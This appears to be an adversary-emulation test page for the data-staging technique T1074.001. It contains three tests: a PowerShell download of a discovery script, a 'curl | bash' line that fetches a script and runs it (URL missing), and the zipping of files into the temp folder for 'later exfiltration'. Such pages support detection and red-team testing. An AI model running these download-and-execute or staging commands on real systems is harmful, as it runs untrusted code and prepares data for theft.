Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data]( Interactive command shells may be used, and common functionality within [cmd]( and bash may be used to copy data into a staging location.
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory.
Supported Platforms: Windows
Name | Description | Type | Default Value |
output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP\discovery.bat |
Invoke-WebRequest "" -OutFile #{output_file}
Remove-Item -Force #{output_file} -ErrorAction Ignore
Utilize curl to download and execute a basic information gathering shell script
Supported Platforms: Linux, macOS
Name | Description | Type | Default Value |
output_file | Location to save downloaded discovery.bat file | Path | /tmp/T1074.001_discovery.log |
curl -s | bash -s > #{output_file}
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named was placed in the temp directory.
Supported Platforms: Windows
Name | Description | Type | Default Value |
output_file | Location to save zipped file or folder | Path | $env:TEMP\ |
input_file | Location of file or folder to zip | Path | PathToAtomicsFolder\T1074.001\bin\Folder_to_zip |
Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force
Remove-Item -Path #{output_file} -ErrorAction Ignore